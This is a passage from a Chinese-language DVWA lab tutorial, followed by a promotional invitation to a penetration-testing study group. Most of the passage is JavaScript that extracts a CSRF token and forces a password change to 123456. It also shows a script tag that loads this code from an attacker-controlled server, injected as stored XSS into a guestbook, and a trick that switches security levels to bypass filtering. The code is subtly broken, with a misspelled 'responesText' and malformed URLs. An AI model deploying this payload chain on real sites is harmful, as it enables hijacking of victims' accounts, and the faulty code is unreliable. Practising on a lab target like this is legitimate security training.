http://192.168.112.188/dvwa/vulnerabilities/csrf/
页面,然后从相应中取得Token(通过正则表达式提取)取得后在将Token和新密发一起发送给
http:192.168.112.188/dvwa/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change
页面完成密码修改
(4)先构造一个Javascript原生代码发送AJAX请求的代码
var tokenUrl='http://192.168.112.188/dvwa/vulnerabilities/csrf/';
var count = 0;
//实例化XMLHttpRequest,用于发送AJAX请求
xmlhttp = new XMLHttpRequest();
//当请求状态发生变化时,触发执行代码
xmlhttp.onreadystatechange = function(){
//状态码0:请求未初始化,1:服务器连接已建立,2请求已接收,3请求处理中,4请求已完成,且相应已就绪
if(xmlhttp.readyState == 4&&xmlhttp.status == 200)
{
//取得请求的响应,并从响应中通过正则提取Token
var text = xmlhttp.responesText;
var regex = /user_token\'value\=\'(.*?)\' \/\>/;
var match = text.match(regex);
//alert(match[1]);
var token = match[1];
//发送修改密码的语法
var changeUrl='http:192.168.112.188/dvwa/vulnerabilities/csrf/?user_token='+token+'& password_new=123456&password_conf=123456&Change=Change';
if(count == 0){
count = 1; //只发送一次,否则会多次发送
xmlhttp.open("GET",changeUrl,false); //false代表同步方式发送
xmlhttp.send();
}
}
};
xmlhttp.open("GET",tokenUrl,false);
xmlhttp.send();
将上述代码放置在攻击服务器上
想办法将上述JS代码嵌入到被攻击者服务器上即可完成。(High级别无法实现)
<script src="http://192.168.112.183/csrf.js"></script>
在high级别中,屏蔽了
处理方式:先切换到Low级,在留言本里注入以下脚本,然后在切换到High级,直接触发改密
<script src="http://192.168.112.183/csrf.js"></script>
学习路线:
这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。不过,要想从脚本小子变成黑客大神,这个方向越往后,需要学习和掌握的东西就会越来越多以下是网络渗透需要学习的内容:
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!